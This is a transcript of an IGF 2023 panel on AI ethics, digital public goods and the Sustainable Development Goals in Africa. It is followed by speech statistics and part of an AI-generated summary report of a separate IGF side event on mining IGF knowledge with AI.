Thank you. Thank you very much, Mark. And then, perhaps, firstly, thank you for this platform and giving me the opportunity to actually e-visit Japan. I do wish I could have been there in person. I could not, and I apologize for that. So, thank you for this opportunity to e-visit Japan and actually the captivating and quite unique city, Kyoto. I know it is the birth city of Nintendo, and it actually hosts a phenomenal number of the UNESCO World Sites. So, Mark and team, I am very envious of you. So, maybe I will come back to, I was intending to also share with you some of the work we have done or that we are doing. So, I will come back to it. In terms of your question, so looking at AI ethics and governance standards, probably first in South Africa, right, we have the ever-evolving digital landscape, and we have the Protection of Personal Information Act, or POPI Act, and we also have the Cyber Crimes Act, which stands as significant legal frameworks, which is shaping the realm of data privacy, security, and digital crime prevention. So, the POPI Act, which is endorsed in South Africa, that prioritizes the safeguarding of individuals’ personal information. It encourages responsible data handling by organizations. The POPI Act emphasis is on individual privacy and is reshaping the way organizations collect and manage personal data, and it prompts them to adopt stringent data protection measures. Perhaps I can give an example. So, I frequently get these sort of annoying calls, and then I ask, how did you get my number? And then they go about and say, but you do know that I have not shared my number with you willingly, so this is against the POPI Act. And very often the phone goes down immediately. So, people in South Africa are very aware of the POPI Act, and people feel safeguarded through the POPI Act. However, challenges do emerge in balancing innovation and compliance, especially in the age of digital privacy. In parallel to the POPI Act, we have the Cyber Crimes Act. This addresses the escalating threat of cyber crime by providing a legal structure to tackle various digital offenses, thereby fortifying the defenses against cyber threats. So moving forward, I think it becomes quite imperative for businesses, individuals, and law enforcement agencies to actually collaborate in the implementation of these acts. Thank you, Mark.

Moderator – Mark Irura:
Thank you, Mina. And I turn to you, Bobina. So we’ve talked about digital public goods. We’ve talked about how we protect citizens. And Susan gave a very good introduction on what is being done as far as the frameworks that we have are concerned on data rights. SDG number 16 talks about partnerships. As civil society, in this particular field on digital public goods, do you have any collaborations with other stakeholders, whether in private or public sector? And do you think, and that’s loaded, do you think that there’s alignment from what you can see in the landscape, right, with sustainable development as far as AI is concerned right now? Over to you, Bobina.

Zulfa Bobina:
Okay, thank you, Mark. Please allow me to go and record my video because my internet is unstable. Can you hear me?

Moderator – Mark Irura:
Yes, yes, we can hear you.

Zulfa Bobina:
Yes?

Moderator – Mark Irura:
Yes, go for it.

Zulfa Bobina:
Good afternoon. So we lost you now. We can’t hear you. Okay, can you hear me now? Yes, yes, go for it. Okay, great. I’ll quickly get to your question, Mark. Very interesting discussion from the rest of the panelists. Good to hear about the number of things you’ve been working on and just sticking around. I just want to say just from the get-go, the composition itself, I think I’ve just been thinking the idea of AI technologies, even in the continent or globally as a whole right now, being digital public goods, it’s still very much an ideal space that we’re, in a sense, working towards because that’s not really a reality at the moment because a lot of the things you describe as being a digital public good, it’s not includable, it’s more inclusive in a sense, is not really what’s happening at the moment. And so in the sense of trying to relate that to the SDGs and working towards something a world as a whole, as the technology is being adopted here on the continent and how that’s happening along the line of intersection of different partners and how they’re possibly working towards realisation of different SDGs. I think I’ll say I do see a number of examples, for example, here in Uganda where I’m based in Kampala or just across the African region or Africa as a whole. I’ll give an example. I see partnerships along maybe academia and the practice, especially. I’ll give one example, like the Lacuna Fund with the Macquarie AI Lab. For example, here in Kampala, Uganda, I see a lot happening at the Macquarie AI Lab and a lot of that is in partnership with a lot of maybe developing countries or they take themselves. So, for example, the Lacuna Fund, which is building the natural language text and speech database, are being, I think, working in collaboration with Google. So I think a lot of what I see is within the academia space over to private sector. And as civil society just coming in to do more advocacy, both speaking towards the issue of the number of data seekers, I’ve brought ethical considerations in the adoption of these technologies. So I think it’s something that is springing up in a sense. It’s not happening on a very grand scale, but it’s something that we see coming up. And I guess we can hope that it’s only going to, especially with more work being done around the space of advocacy, we can see more of that happening over the coming months and the coming years.

Moderator – Mark Irura:
All right. Thank you so much. Thank you so much, Bobina. And I come back to you, Susan. I’ll act like a journalist and say I’m sure the people in the room are wondering. Probably people in Kenya will say the Kenyans are asking as if it’s one person. How do we move from these frameworks, right, to the actual implementation? And what are some of the things that you’re doing in this regard so that they don’t remain on paper?

Susan Waweru:
Mark, that’s a good question. And it’s one I’m passionate about. I’m known as the get-it-done girl. So my reputation is to move things from paper to actual implementation and execution. Death in the drawer is a concept we learn in policy and in business administration where you can have the best policies, you can have the best strategies, frameworks, legislations, all documented. And that is one thing you see in Kenya. We have some of the best documentations even borrowed by the West. But implementation becomes one of the biggest challenges, not only in AI but in the tech space. So how you get it done, from my perspective, is one. Leadership matters. If you don’t have leadership commitment to getting what is on paper out to be physically seen, would be a challenge. So what we do is, as the technocrats in government, we seek to influence leadership. And we have some of our parliamentarians here with us. We seek to influence them on the importance of what has been documented. Because if the policy is done at the strategy level and just benched, then it becomes a challenge. But as technocrats, influencing the leadership on the importance of the documents that have been prepared is key. Once you get the leadership buy-in, then it trickles down to the user and the citizenry buy-in. Because those using the frameworks, for example, the Data Protection Act is an act passed by parliament to be implemented majorly. It affects majorly data controllers and data processors. Who are largely entities. So if we don’t get entities on board through awareness creation, through advocacy, then we don’t have that document done. And one way to get user buy-in, and we’ll talk about this later, is to have a free flow of information. To be transparent in what you do. To be very simple and clear on what the compliance journey is for data protection and for privacy. So leadership buy-in. Leadership matters, citizenry buy-in. Another thing is collaboration. Partnerships with organizations and entities who have executed that which is in our documentation. Once we collaborate, for example, with other bodies, other government agencies, for example, who have implemented their AI applications successfully in the Kenyan government, then we collaborate with them on how to do that. Currently in Kenya, I can say this get-it-done attitude is at high gear. In the tech space, the government has what it calls the Digital Transformation Agenda. It’s spearheaded by the presidency, with the president himself overseeing and calling out most of the projects. Currently that Digital Transformation Agenda is at infrastructure development stage and onboarding all government services onto one platform which we call eCitizen. And he gives specific timelines on when he wants all of that done and checks them himself. That’s the leadership. That’s the level at which the government of Kenya is interested in digitization towards moving to an intelligent government where we don’t react to public sector needs. We preempt them and provide them even before they happen. Those are the three ways, Mark, I would say, how we get documentation to the ground.

Moderator – Mark Irura:
Thanks, Susan. Of course, today we’ll wait to see what you’ve been doing as well with AI itself. I hope we can get a chance to see that if we don’t run out of time. I come to you, Dr. Mina, and I ask about training and capacity building. What does that mean to you for different stakeholders, whether they’re in policy, whether it’s the level of graduates that we have? We know a lot of them have to go overseas or outside the continent to get their training to be able to come back and be part of an ecosystem. So what does that look for you right now, and especially now with the risks and the potential harms of AI being apparent? Thank you.

Meena Lysko:
Thank you, Mark. I’m really looking forward to share some of the programs we’re busy with currently, but I’ll hold back and maybe address this particular key question. So the emphasis should be in including ethics in AI systems lifecycle. So that should be from conception all the way through production, and it’s a cycle. It means that it should go continuously at a sustained sort of initiative throughout the working stages of a particular system. Within some of the programs, and for example, the one I’m currently on, we’ve incorporated a module on AI ethics and bias. Now, albeit that we are looking at very hands-on development, we looked at the soft skill, if I can call it that, where we need for our participants, our trainees, to emphasize that the adopting of ethics in AI is more than just knowing ethical frameworks and the AI systems lifecycle. So you require awareness of ethics from the perspective of knowledge, skills, and attitudes. And that means knowledge of laws, policies, standards, principles, and practices. And then we also need to integrate with that professional bodies and activists. And we have a number within South Africa itself. For example, we have an AI overarching representative within South Africa as a body. We have, I think it’s called DepHub in South Africa, which focuses on AI policies and data recommendations. And then we must also look at application of ethical competence. So we need an ethically tuned organizational environment. And in tune with that as well, we have to look at ethical judgment. So we’ve been emphasizing that our participants in our training program is fully aware of these aspects. So they need to be, their projects, their developments require to be guided by their ethical principles and philosophies. So they need to be imbibed with that. In the projects that they are in, they have to apply ethics throughout the design and development process. And we’ve also, to ensure that we are training people in AI and data science as an example, but we’ve also incorporated to invite industry experts into our sessions for engaging with the participants so that there is an encouragement of healthy knowledge sharing. But also in the opposite direction, there is youthful perspectives that is shared on promoting morally sound solutions. So they’re not yet contaminated with what is going on in a market for the purposes of just for profit. And that’s where we’ve seen it happening within our training programs as a very successful sort of sharing mechanism conjured. Thanks, Mark.

Moderator – Mark Irura:
Thanks, Mina. And I come to you, Darlington, and I ask this question that touches a little bit on what Dr. Mina said, working with industry experts. So you have a bucket where we have the SDGs, we have the AI and the problem that needs to be solved. In your case, you talked about radiology and being able to read and interpret what those images mean. And then we have the complexities of running a business. So talk to us a little bit about strategies. If any exist to align this in the work that you’re doing. If you’re still there. Darlington is not there. Okay, then I would move to you, Bobina. Are you online?

Zulfa Bobina:
Yes, I am.

Moderator – Mark Irura:
All right. I will ask a question that is related to ethical deployment of AI. What are you doing as civil society in this regard to make sure, for example, that people will not be left behind by digitization and digitization topics, that children will learn at an earlier age about the risks of these technologies and even as they begin to use them? Over to you, Bobina.

Zulfa Bobina:
Okay, thank you, Mark. I hope you can hear me. That’s a really profound question because I think it goes over a lot of the things we’re trying to unpack throughout this conversation. But also, like Dr. Aminah was going over a number of the ethical concerns and how these are being navigated. But I’ll say, well, for instance, with the work with blood policing, a lot of what we do is research, which is sociotechnical, in a sense. So we’re not developers, but we look at the land and look at how these technologies, as they’re being adopted and deployed, in different communities. So in our role, in a sense, a lot of what we’re doing is one knowledge production with our research, and then advocacy on the other hand. So with the knowledge production, I would say a lot of, just like very largely, the things we’re looking at very critically right now in terms of just addressing the ethical concerns and bringing communities to understand the workings of these technologies because we think it’s very elitist to… I think we always compare this to the health conversation where there is a disease outbreak and then governments find a language to communicate that this is about the general population even when there is all this scientific language about it. So I think we’ve been trying to think around this and how do we come up with language that the populations, the ordinary person within the country or anywhere else across the continent will be able to understand these technologies and how they impact them on a day-to-day, how they can incorporate them in their lives and how this could be something to just benefit their lives. I think on just like a broader scale, also just given the time I have, just going over those two points of knowledge production and advocates, I think we’re looking very critically at issues of one, visible lighting workers. So this is really a composition of automation and the invisible workforce behind a lot of these technologies that we’re being told are sort of working frictionlessly. So trying to get the understanding, the buying of government was supposed to be regulated in a sense for these technologies that are being adopted by, for example, the people doing this work, this invisible work. So that’s one of the things we’re looking at. The other being the harmonization of collective and individual rights. So a lot of the frameworks, I think, that are being developed, and I think this is a trickle from the West where we’re getting sort of like a blueprint from the GDPR, et cetera, where we see that a lot of our frameworks are driven towards individual rights. I think that’s problematic, especially as a society, a data find more and more, there is need for us to move towards a place where we harmonize both collective and individual rights and that would bring in a participatory. Thank you.

Moderator – Mark Irura:
Hi, Bobina. Can you hear me?

Zulfa Bobina:
Yes, I can hear you. I don’t know if you can hear me.

Moderator – Mark Irura:
Yeah, I lost you temporarily. Just repeat the last sentence as you wind up. Audible gasp. Okay. No, we’re here with you. Please, please. Yeah, yeah. Ah, I think we lost Bobina. Okay. Darlington, I see you’re settled now. Okay, perfect. Cool. I had a question for you, which I think you did not hear, but I will take two questions from the audience. You can prepare them if anyone has a question and probably one from the room and one online. My question to you, Darlington, before we lost you in cyberspace, was we have the SDGs, the Sustainable Development Goals, we have you as a business, and then we have AI, and not all the time these interests are aligned. Sometimes it’s the business which has to take precedence. Sometimes, like in the problem that you gave us, you’re trying to solve a really impactful problem, and at times it’s just, you know, you have to comply with some certain regulations. What are some of the strategies that you have to align all of this in solving the problems that you want to do and also aligning with the SDGs?

Darlington Akogo:
Yeah, I mean, that’s a very, very important question. The initial solution or the initial strategy is make sure your business is built around solving a problem in itself, so a problem connected to the SDG. Then fundamentally, there’s no conflict to begin with. So if you are profiting off of something that is damaging the environment or destroying the health of people, then alignment becomes a really, really big problem. But if fundamentally you have a social enterprise, you have business built around solving a problem, like in our case, the whole business is built around being able to provide healthcare and make it accessible to everyone. For Mino Health and for CARA, we’re making sure we solve food security. Outside of that, you know, there are definitely instances where maybe if you took one route, you’d make a lot of profit, but the impact might not be so much. And then there’s another route where, you know, it might not be the case. So I can give you a real-world example. So we work on drug discovery with AI. There’s a scenario we’ve looked at where you could take certain conditions, work on new drugs for them, and it’ll be very expensive. You know, there are certain medications where, you know, a few tablets are tens of thousands of dollars, hundreds of thousands and millions, and you could sell it to a few people and make a lot of money. But then the question is, are you actually building any equitable access to healthcare by doing that? And so when it comes to those scenarios, you need to have guiding principles. What you can do is have an internal constitution that says this is our moral backbone and we need to live by it. And the board is basically obliged to make decisions off of it. So even if the CEO veers off by not following that internal code of conduct, that constitution, they could be voted out. And depending on how serious you are about this, you can solidify this within the company’s constitution, and then it will be fully followed. Some people go a step further, even the way you register the business. So there’s a category in some countries where you can register as a social enterprise or, you know, for profits, but for public good, I think the term is. And when you do that, it means that your primary obligation is not to shareholders and investors, it’s to the public. So those are legal ways of making a binding to make sure that you are actually focused on addressing the SDGs and not just, you know, maximizing profits.

Moderator – Mark Irura:
Thank you, thank you. And I guess what I’m hearing from you as well is the ability to also consider self-regulation, especially in this space, as you innovate, as you solve these problems, even where there might be a lacuna in the law or in the frameworks that exist. I don’t know if there are any questions coming in from the room to begin with or from online. Yes. Hi, Leah.

Audience:
Hi, everyone. I’m Leah from the Digital Public Goods Alliance. And I think we should also quickly talk about infrastructure. I mean, apparently we had some troubles here, which is a good bridge to talk about data infrastructure and access to compute. Obviously you need both of them in order to democratize the use of, the development of, and also the benefits of AI in an African or global South context. So how do you deal with these challenges in your project, in your country context? Thank you.

Moderator – Mark Irura:
So I will open up that question to anyone to take it up. Yeah.

Susan Waweru:
Thank you for the question. And something in Kenya, one of the things I mentioned under the digital transformation agenda is the first building block is the infrastructure. So I know for the next five years, the government is having the last mile connectivity project which seeks to bring fiber connectivity to every market, to every bus station, to every public entity. That will give free wifi and that gives them the access to digital public goods. So that’s one of the things that was adopted as one of the first things to be done because you can’t develop digital public goods without accessibility. Accessibility, equal accessibility is very important. And I think one of the bedrocks to make AI successful in other tech and DPGs. So that’s what I know from the Kenyan experience that’s happening.

Meena Lysko:
Anyone else? Dr. Amina, would you like to come in? Yes, sure, Mark. I was looking for a Zoom, raise my hand, but thank you for asking me as well. I think from a South African perspective, let’s see if I can turn the video on. So from a South African perspective, you may have read in the news or aware that we have this thing called load shedding. It’s a term coined within South Africa where it is a structured approach for us to actually manage electricity within, power consumption within the country when there are constraints on the national grid. So this brings about, of course, in addition to what we do have existing as challenges and I guess globally, with infrastructure to ensure connectivity is redundancy. But with redundancy, I guess we also need to ensure that it is affordable and it must be affordable to every latitude and longitude and to the decimal of latitude and longitude. So it reaches every sphere of life within the world. And well, from a South African context within South Africa. And in running our bootcamp, for example, a program we are currently doing, this has been a challenge to run a hybrid program where people cannot stay online for the entire duration full of the training because of this matter of connectivity. Fortunately, we record sessions so they can follow it up post the session. So we have solutions around it. So the one aspect is infrastructure, but it is also about redundancy. And then it is also the question of, we have this reliance in education and training and also now in our kind of 4IR where we are relying heavily on infrastructure. And the question becomes, what happens if someday for whatever reason, and we’ve seen this through global to disasters, natural disasters in various parts of the world, how do we then manage to come back online as expediently as possible when infrastructure is affected? Because in this 4IR, in this AI and data evolved world, our reliance is fully on infrastructure to keep global economies going. So that the risk is quite high. And I think that kind of is like a call for action to look into this. In kind of going in the opposite extreme, is the question of the impact infrastructure has on the environment. So in energy consumption, for example, is massive, right? Within this context. So these are sort of things that I think we have to be very mindful of and look into in a responsible, we talk about responsibility. So we gotta be responsible about that as well. Thank you, Mark.

Moderator – Mark Irura:
Thank you, thank you. I don’t know if Sumaya, you can find one question for us online to read out.

Audience:
Thank you, Mark. We have a few questions online. Okay. So the first one is, do we have an AI policy in Kenya? Question mark. If yes, and legislation to operationalize the policy. Question number two. How should human workers perceive and interact with robots working alongside them? Question mark. Are these robots supposed to be treated as tools or colleagues by the humans working with them? So the question’s here. Thank you.

Moderator – Mark Irura:
Susan, I’ll direct the one for Kenya to you.

Susan Waweru:
Kenya has what is the digital master plan. In it is some aspects about AI. Recently, about two weeks ago, the government led by the president instructed for an AI legislation to be drafted. So that’s an ongoing work. Further, there’s a central working group that’s looking at all tech-related legislations, policies, and strategies. And one of the things that will be considered is the AI policy in place. So the answer is yes. Within the digital master plan, we have aspects of the AI policy within there. But however, there are efforts, I think, within this year to have legislation, policies, and strategies that will guide that.

Moderator – Mark Irura:
Thank you. And then the second question is existential, right? Should humans interact with robots? We already are, right? We already are to some extent. If there are questions online and in the room, we will take them and we will continue to answer them because I want to move to ask our panelists and everyone who has shared here to take a minute and just wrap up and leave the room. We wanted at least to hear what’s happening. We wanted to show you what’s happening. And we wanted you to appreciate, we are not just talking in Africa. We are doing something. And I don’t know if I begin with you, Yilmaz. If it’s okay, like just a minute, yeah.

Yilmaz Akkoyun:
Yes, thank you so much. It’s a real privilege to listen to these different examples and use cases because this was really inspiring for me. And hear more about it, creating African AI and how it works, also the challenges and how you deal with it. This was super helpful. I would like to stay in close touch with you to continue this conversation. I think it’s just the starting point. And I’m so happy to see the success stories already. And I can just congratulate to this panel, to you also for the amazing moderation and the different panelists which participated also from remote. And let’s please continue this conversation. And for now, I can just, I absorbed so much because I didn’t hear about it too much in advance. And yeah, this is why we are also here to get in touch and join the IGF here. And I think it’s just the beginning.

Moderator – Mark Irura:
Thank you. As Sumayya, are we going to put it up? Are we going to put it up? Okay, good. As you prepare, then I’ll go online and I will ask Bobina to reflect on her closing remarks.

Zulfa Bobina:
Sure, thank you very much again for having me be a part of this conversation. I think like someone had mentioned earlier, there has been a lot of conversations happening even at Kyoto, in Kyoto rather, about just weighing around the compositions, I mean, going around AI technologies as a whole. So I think to be talking about the direction of, how do we get to realize this being a digital public good and indeed, being of benefit to everyone is a point towards, we’re coming from the point of the initial compositions around digitization and now as a public, as a whole is getting data paid more and more, how do we let the composition evolve as the technologies are evolving as well? And so I think for me, I’m very excited to just hear about some things that are happening here and there across the continent and very excited to see more of that and very happy to keep in touch with you all to just let this conversation keep on going. Thank you.

Moderator – Mark Irura:
Thank you so much. And then I move to you, Dr. Mina.

Meena Lysko:
Thank you, Mark. In context of the sustainable development goals, our training has aimed to support quality education, industry innovation and infrastructure, zero hunger and responsible consumption and production. I take with me today what you have said and I think that could be a nice global call. Self-regulate as you innovate. Our post-training feedback from previous programs as well as feedback from participants in our current program is giving a glimpse of how a paid forward is being achieved. And then I want to kind of sum up by saying this, proprietary AI systems are generally used to make money, enable security, empower technology, simplify tasks that would otherwise be mundane and rudimentary. But if AI ecosystems could be designed to take advantage of openly available software systems, publicly accessible datasets and generally openly available AI models and standards or open content, it will enable digital public goods to avail for Africa generally free works and hence contribute to sustainable continental and international digital development. Thank you, Mark.

Moderator – Mark Irura:
Thank you. And then I move to you, Darlington.

Darlington Akogo:
Yeah, so I think we are in one of the best moments in human history where we are building technology that finally digitize what makes us special as a species and potentially even surpasses. The potential is beyond anything we can think. So we are what, seven years away from the deadline of the SDGs. And there’s a lot of realization that we are not close to meeting the targets. I strongly believe if we can double down on properly using AI ambitiously, whether in Africa, Asia or anywhere in the world, if we can seriously double down, invest properly in it, we can address right about everything on the SDGs. There’s no limit to how far AI can go, especially in the context of foundation models now and how general they are. So I would say let’s double down on it, but let’s do this in a very responsible and ethical way. So as we are solving the SDGs, we don’t create a new batch of problem for the next target that we have to create. So let’s leverage AI and solve the SDGs.

Moderator – Mark Irura:
Thank you so much. And before Susan closes for us, they have been working on an interesting project. Maybe she can talk to us about it and then give us closing remarks. It’s been projected before you. It’s a tool that can help citizens to learn about the act and it can communicate in Sheng. Sheng is a mixture of Swahili and English, English and Swahili. So over to you, Susan.

Susan Waweru:
Thank you, Mark. So just to quickly run through, one of the things we are developing is an AI chatbot to provide the services that the ODPC should provide. This chatbot is using natural language processing with large datasets to just train it on the questions the citizenry may have on the ODPC project. So it speaks both English and Swahili, which are the two official languages in Kenya. So Sumai, if you just may ask it, what is a data controller? This is an awareness tool. It’s a tool to enhance compliance. It’s a tool to bring the services closer to people. And it just overcomes challenges such as the eight to five working day. So as a data controller and a data processor seeking to register or make a complaint, you’re not limited to working hours. That can be done at any time. It gives information, it gives processes, and it’s all free of charge, giving it accessibility. So to just end the session, my clarion call is that AI is inevitable. Both, we’re already using it. It’s already on our phones. It’s already in our public services. So it’s inevitable. The main thing I would say is to have it human-centered. Even when we’re developing the chatbot, we put ourselves in the shoes of the citizen more than the benefit of the organization. So if we can enhance human-centered AI and maybe bring up the benefits more than the risks, that would be best. The way to do this is to demystify AI. And such a panel is one of the things we do. You demystify it, because currently it’s a scary big monster, which is not what it truly is. That’s not the whole aspect. It’s what it could be, but it has much more benefits, especially to public service delivery. And with that, Mark, I just want to say thank you to you and the organizers, Sumeya and Bonifaz, for this, and largely to IGF.

Moderator – Mark Irura:
Thank you so much. Let’s give a round of applause to everyone who’s contributed to this conversation. I hope the session has been valuable to you. I hope you learned something. And I hope we can connect. I hope we can talk more about the topic. Thank you so much. And thank you online as well for joining us. Thank you so much. Bye.

Audience

Speech speed

183 words per minute

Speech length

189 words

Speech time

62 secs

Darlington Akogo

Speech speed

185 words per minute

Speech length

1254 words

Speech time

406 secs

Meena Lysko

Speech speed

134 words per minute

Speech length

1635 words

Speech time

731 secs

Moderator – Mark Irura

Speech speed

148 words per minute

Speech length

2163 words

Speech time

876 secs

Susan Waweru

Speech speed

161 words per minute

Speech length

1629 words

Speech time

606 secs

Yilmaz Akkoyun

Speech speed

146 words per minute

Speech length

919 words

Speech time

377 secs

Zulfa Bobina

Speech speed

182 words per minute

Speech length

1291 words

Speech time

427 secs

IGFโ€™s knowledge unlocked: AI-driven insights for our digital future | IGF 2023 side event

Table of contents

Disclaimer: It should be noted that the reporting, analysis and chatbot answers are generated automatically by DiploGPT from the official UN transcripts and, in case of just-in-time reporting, the audiovisual recordings on UN Web TV. The accuracy and completeness of the resources and results can therefore not be guaranteed.

Full session report

Markus Kummer

The initial stages of the Internet Governance Forum (IGF) primarily focused on connectivity and internet access, with no consideration given to artificial intelligence (AI). During that time, the main concerns revolved around ensuring that people had access to the internet and were able to connect. However, as time went on, the landscape changed significantly with the advent of apps, video streaming, smartphones, and other technological advancements facilitated by AI. These developments highlight the growing importance of AI in shaping the digital world.

Despite the progress made in connecting people to the internet, challenges still exist in bringing the last billion individuals online. The assumption was that the industry would take the lead in connecting this population, but it has proven to be a difficult task. One of the major hurdles in this endeavor is language and cultural diversity. The remaining individuals who are not yet connected to the internet predominantly come from non-English speaking countries. Overcoming these linguistic and cultural barriers is essential to ensure universal access to the internet.

The Tunis agenda, a significant document related to Internet governance, outlined a broader definition of the concept beyond just the management of the Domain Name System (DNS) and internet protocol resources. It acknowledged that Internet governance encompassed a range of issues concerning the use and abuse of the internet. This expanded understanding remains relevant and continues to guide discussions and decision-making in the field.

The IGF has accumulated an immense amount of data over the years. It has been suggested that this data should be mined for valuable insights. In 2011, Vint Cerf, one of the founding fathers of the internet, highlighted the importance of data mining during the Nairobi IGF. Data mining involves extracting meaningful information and patterns from extensive datasets. Given the rich and diverse dataset available within the IGF, there is the potential to uncover valuable insights that can inform future policies and strategies around internet governance.

AI applications can play a crucial role in mining and categorizing the vast amount of data accumulated through the IGF. Markus Kummer, a prominent figure in internet governance, has mentioned the publication of a book summarizing the knowledge generated through the IGF. This highlights the challenge of effectively mining and utilizing the wealth of information available. By leveraging AI tools, the process of data mining and categorization can be significantly enhanced, allowing for more efficient and accurate analysis of the vast dataset.

In conclusion, while AI was not initially considered during the early stages of the IGF, its importance has become increasingly significant with the evolution of the digital landscape. Challenges persist in connecting the last billion individuals to the internet, particularly in dealing with language and cultural diversity. The broader definition of internet governance outlined in the Tunis agenda remains valid and continues to shape discussions within the field. The immense data accumulated through the IGF presents an opportunity for valuable insights when mined and analyzed effectively, with AI applications serving as useful tools in this process.

Jovan Kurbalija

The importance of preserving the knowledge generated during Internet Governance Forum (IGF) sessions was emphasised. This knowledge has the potential to assist and benefit communities affected by digitalisation issues. The Diplo Foundation, in collaboration with Markus Kummer, has been documenting IGF sessions since 2006. To facilitate this process, AI technology is employed, enabling the creation of summaries, reports, and daily digests. The AI system has the capability to codify and translate the arguments presented during sessions, resulting in the development of a comprehensive knowledge graph.

The knowledge database generated from IGF discussions is considered a public good that belongs to all stakeholders. However, it was noted that this valuable resource is currently underutilised. Therefore, there is a collective call for the initiation and promotion of the IGF knowledge database, aiming to fully harness its potential benefits.

While there are extensive discussions about the impact of Artificial Intelligence (AI) on humanity, the need to explore AI as a practical tool and gain a comprehensive understanding of its functionalities was recognised. It was suggested that the Internet Governance (IG) community should focus on delving into the practical aspects of AI, rather than mere speculation about its potential impacts.

To enhance knowledge sharing and coherence, it was proposed that an AI tool be developed to connect and compare discussions across various IGF sessions. This tool would help identify commonalities, link related topics, and facilitate a more comprehensive understanding of the subject matter.

The use of AI for the session report system was viewed positively, as it allows experts to collaborate with AI technology to generate interactive reports. These reports include detailed breakdowns per speaker, narrative summaries, and discussion points, as well as information regarding speech length and speed. The AI system continuously learns and improves through the integration of corrective feedback.

The IGF has evolved into a knowledge base that holds significant influence over Internet-related organizations. It serves as a platform for learning, capacity building, and the provision of global resources. Notably, the IGF’s culture of respect and engagement, which fosters a listening culture and promotes the acceptance of diverse opinions, was highly appreciated. There was a suggestion to utilize AI and human expertise to propagate this culture among younger generations, strengthening the overall impact and sustainability of the IGF’s mission.

In conclusion, the extended summary highlights the importance of preserving knowledge generated during IGF sessions and emphasizes the collaborative efforts between the Diplo Foundation and AI technology in documenting and summarizing these sessions. It underlines the call for the initiation and utilization of the IGF knowledge database, as well as the need to explore the practical aspects of AI. The potential benefits of an AI tool to link and compare discussions across various sessions are recognized. The positive perspective towards utilizing AI for the session report system is noted, along with the IGF’s influence as a knowledge base and its culture of respect and engagement.

Sorina Teleanu

The International Governance Forum (IGF) held discussions on the role of Artificial Intelligence (AI) in society, with a focus on its benefits rather than its potential to replace humans. The sentiment expressed during the discussions was positive.

Speakers at the IGF emphasized the need to approach AI in a practical manner and avoid cliches. They encouraged participants to explore how AI actually works, rather than focusing solely on its ‘magic’. This proactive stance aims to deepen understanding and harness the full potential of AI.

There was a consensus among the speakers that AI is not detrimental to jobs, but rather a tool to assist humans. They dismissed the idea of AI taking over human jobs in the near future and highlighted the importance of AI supporting and enhancing human capabilities.

One significant concern raised at the IGF was the underutilization of the valuable information produced. While the forum generates a wealth of knowledge, it was acknowledged that much of it remains unused or unexplored. This raises questions about the effectiveness of disseminating and utilizing the knowledge generated by the IGF.

The speakers also stressed the potential of technology in maximizing the knowledge acquired by the IGF over the years. They emphasized the need to leverage technology to track the evolution of discussions and enhance understanding of topics such as the digital divide. By harnessing technology, the wealth of knowledge accumulated by the IGF can be effectively utilized to contribute to the achievement of the Sustainable Development Goals.

Additionally, there was an emphasis on the need to move the discussions forward and avoid repetition. The speakers highlighted technology as a means to facilitate progress, avoid cliches, and promote innovation in governance and societal debates. Using technology as a starting point for discussions can provide an overview of previous debates and lay the groundwork for more in-depth and constructive conversations.

In conclusion, the discussions at the IGF established that AI will bring about benefits without replacing humans. The importance of approaching AI in a practical manner, avoiding cliches, and harnessing technology to maximize the utilization of knowledge were key takeaways. Moving forward, the IGF aims to leverage technology to advance governance and effectively address societal challenges.

Wim Degezelle

During discussions about Internet Governance Forum (IGF) activities, it was identified that there is a need to improve the codification and collection of knowledge. The participants emphasised the importance of moving beyond mere discussions and working towards tangible outputs. This indicates a desire to generate concrete reports and outcomes from IGF discussions.

Another point raised was the need for better coordination and consolidation of similar discussions that take place at different workshops within the IGF. It was observed that multiple sessions on internet fragmentation often resulted in repeated messages about collaborative work, albeit using different phrasing. The crowded schedule of IGF sessions was identified as a challenge, making it difficult to establish links to previous discussions from past years or sessions. Therefore, participants suggested that better coordination and consolidation of similar discussions would improve efficiency and reduce redundancy within the IGF.

Participants also acknowledged the potential role of AI and other technologies in enhancing knowledge management. It was noted that during meetings, a specific tool was able to break down participants’ words into distinct arguments and label key topics. Additionally, the tool was capable of associating relevant Sustainable Development Goals (SDGs) with the discussions. This demonstrates how AI and technology can help categorise and link discussions, facilitating better knowledge management within the IGF.

Moreover, there was a shared positive sentiment towards the potential of the tool to compare and link discussions from different sessions. Participants expressed a desire for the tool to identify common themes across multiple sessions and suggest comparative analysis. This highlights the potential for AI and technology to further enhance knowledge management within IGF by providing a comprehensive and comparative understanding of discussions.

In conclusion, the discussions surrounding knowledge codification and collection within IGF activities stressed the need for tangible outputs and better coordination of similar discussions. Furthermore, the value of AI and other technologies in categorising, linking, and enhancing knowledge was recognised. The potential for these technologies to compare and link discussions from various sessions was also highlighted. Overall, this analysis provides insights into improving knowledge management within the context of IGF.

Audience

The Internet Governance Forum (IGF) has become a vital platform, enabling stakeholders to participate and contribute to policy discussions related to the internet. This inclusive forum allows dialogue and collaboration among governments, non-governmental organizations, businesses, academic institutions, and individuals interested in shaping the internet’s future.

One key aspect that sets the IGF apart is its ability to influence internet-related organizations. Stakeholders have found the IGF to be an important channel for contributing to policy development and decision-making processes. This influence has been significant, shaping the strategies and actions of internet governance entities.

The IGF’s positive impact is reinforced by its evolution and longevity, surpassing initial expectations. It was originally anticipated that the IGF would only last for a limited period, but its resilience and continued success prove its value. The IGF is now regarded as a model worth emulating, leading to the establishment of similar forums worldwide and the contribution of resources from various regions, strengthening global internet governance.

Another significant aspect of the IGF is its role in promoting global collaboration and discussion. The forum provides a platform for stakeholders to engage in fruitful dialogue, allowing for agreement and disagreement. Through open exchanges and constructive debates, the IGF facilitates consensus building, shaping policies that impact internet governance. Additionally, the IGF’s influence extends beyond its immediate activities and impacts other internet governance organizations operating in related domains.

In conclusion, the Internet Governance Forum (IGF) has become a valuable knowledge base and a platform for global collaboration and discussion. Its importance lies in bringing together diverse stakeholders, providing opportunities for active participation, and influencing internet-related organizations worldwide. The continued success and growth of the IGF over the past two decades highlight the need for its continuation and evolution in the future.

Anja Gengo

The Internet Governance Forum (IGF) is an extensive database that contains a vast collection of reports, records, and documents on digital inclusion. For the past 18 years, the IGF has been actively producing various types of reports and documents, which serve as significant indicators of the current state of affairs and future directions in the field. This highlights the IGF’s commitment to remaining up-to-date and providing valuable insights into the digital inclusion landscape.

One argument presented is that artificial intelligence (AI) can be a valuable tool in managing the IGF’s massive database, provided that it is a trusted system. AI has the ability to process data quickly and yield accurate results, thereby enhancing the IGF’s data processing capabilities and achieving a higher level of inclusion in its processes.

